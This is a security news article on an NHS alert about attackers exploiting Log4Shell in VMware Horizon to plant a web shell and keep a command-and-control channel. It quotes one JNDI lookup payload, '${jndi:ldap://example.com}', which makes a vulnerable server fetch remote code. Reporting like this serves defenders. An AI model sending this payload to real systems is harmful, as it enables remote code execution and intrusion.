The National Health Service (NHS) in the United Kingdom has issued a cyber alert warning of an unknown threat organization using Log4Shell vulnerabilities to attack VMware Horizon systems. Log4Shell is a zero-day attack for CVE-2021-44228, a significant arbitrary remote code execution flaw in Apache Log4j 2.14 that has been actively exploited since December 2021.
Following security upgrades from Apache, the aforementioned and four other vulnerabilities were resolved, and Log4j version 2.17.1 is now deemed secure. According to the NHS notification, the actor is using the exploit to get remote code execution on vulnerable VMware Horizon deployments on public infrastructure.
“The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory InterfaceTM (JNDI) via Log4Shell payloads to call back to malicious infrastructure,” explains the alert.
The attack then leverages the Lightweight Directory Access Protocol (LDAP) to retrieve and launch a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service when a vulnerability has been detected. An attacker can then employ the web shell to carry out a variety of malicious operations, such as distributing other malicious software, data exfiltration, or ransomware distribution.
The actor is taking advantage of the Log4Shell-vulnerable Apache Tomcat server nested within VMware Horizon. The exploitation starts with the frequently used “${jndi:ldap://example.com}” payload, which launches the PowerShell script below from Tomcat. This command calls a win32 service to collect a list of ‘VMBlastSG’ service names, retrieve paths, drop a listener in ‘absg-worker.js,’ and then restart the service to activate the implant.
The listener is then in charge of executing arbitrary instructions as header objects with a hardcoded text received through HTTP/HTTPS. The actor may now undertake data exfiltration, command execution, or ransomware deployment since he or she has established constant and consistent contact with the C2 server.
Threat actors targeting VMware Horizon aren’t the only ones leveraging the Log4j vulnerability. The Conti ransomware operation is also using Log4Shell to propagate laterally to unprotected VMware vCenter servers, making it easier to encrypt virtual machines.